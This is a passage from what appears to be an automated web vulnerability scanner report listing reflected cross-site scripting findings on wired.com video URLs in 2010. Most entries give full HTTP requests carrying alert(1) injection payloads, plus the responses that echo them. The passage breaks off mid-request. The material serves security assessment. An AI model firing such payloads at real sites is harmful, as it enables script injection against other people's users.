1.1015. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf961"-alert(1)-"8a5c791c98a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574bf961"-alert(1)-"8a5c791c98a/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:05 GMT
Date: Mon, 22 Nov 2010 00:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001","1716440574bf961"-alert(1)-"8a5c791c98a","highlights","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1016. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd60e"-alert(1)-"3a818245bb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40scd60e"-alert(1)-"3a818245bb6/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:52:54 GMT
Date: Mon, 22 Nov 2010 00:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001","noire-thriller-set-in-seedy-los-angeles-of-the-40scd60e"-alert(1)-"3a818245bb6","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1017. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b836d"-alert(1)-"ccd59f0741 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001b836d"-alert(1)-"ccd59f0741 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:32 GMT
Date: Mon, 22 Nov 2010 00:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672339556001b836d"-alert(1)-"ccd59f0741","1716440574","highlights","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1018. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fea0"><a>adc0cc061c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8fea0"><a>adc0cc061c4/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29426
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:42 GMT
Date: Mon, 22 Nov 2010 00:45:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8fea0"><a>adc0cc061c4 ss_latest-videos c_highlights">
...[SNIP]...

1.1019. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bb21--><script>alert(1)</script>1d4a681cdd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29461
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:17 GMT
Date: Mon, 22 Nov 2010 00:46:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001
-->
...[SNIP]...

1.1020. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc1a"-alert(1)-"126a372399a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos4bc1a"-alert(1)-"126a372399a/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:51:57 GMT
Date: Mon, 22 Nov 2010 00:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","666144939001","latest-videos4bc1a"-alert(1)-"126a372399a","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1021. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c924"><a>8ffe3551f0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos7c924"><a>8ffe3551f0e/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:20 GMT
Date: Mon, 22 Nov 2010 00:46:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos7c924"><a>8ffe3551f0e c_highlights">
...[SNIP]...

1.1022. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78d1e"-alert(1)-"0532cbb1e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights78d1e"-alert(1)-"0532cbb1e6a/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:13 GMT
Date: Mon, 22 Nov 2010 00:48:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","666144939001","latest-videos","highlights78d1e"-alert(1)-"0532cbb1e6a","1716440574","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1023. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a01"><a>8733d8ce931 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights36a01"><a>8733d8ce931/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:51:54 GMT
Date: Mon, 22 Nov 2010 00:47:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights36a01"><a>8733d8ce931">
...[SNIP]...

1.1024. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40624"-alert(1)-"16bcb075647 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/171644057440624"-alert(1)-"16bcb075647/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:29 GMT
Date: Mon, 22 Nov 2010 00:48:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","666144939001","latest-videos","171644057440624"-alert(1)-"16bcb075647","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1025. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc9c"-alert(1)-"b02f73af82f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff9fc9c"-alert(1)-"b02f73af82f/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:52 GMT
Date: Mon, 22 Nov 2010 00:48:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "666144939001","latest-videos","tron-legacy--the-payoff9fc9c"-alert(1)-"b02f73af82f","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1026. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f1a"-alert(1)-"d99d5ed6aaf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/66614493900140f1a"-alert(1)-"d99d5ed6aaf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:02 GMT
Date: Mon, 22 Nov 2010 00:49:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","latest-videos","66614493900140f1a"-alert(1)-"d99d5ed6aaf","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1027. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86308"><a>f32b843750c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video86308"><a>f32b843750c/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29421
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:48 GMT
Date: Mon, 22 Nov 2010 00:38:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video86308"><a>f32b843750c ss_latest-videos c_latest">
...[SNIP]...

1.1028. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 290c1--><script>alert(1)</script>bf3897741a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
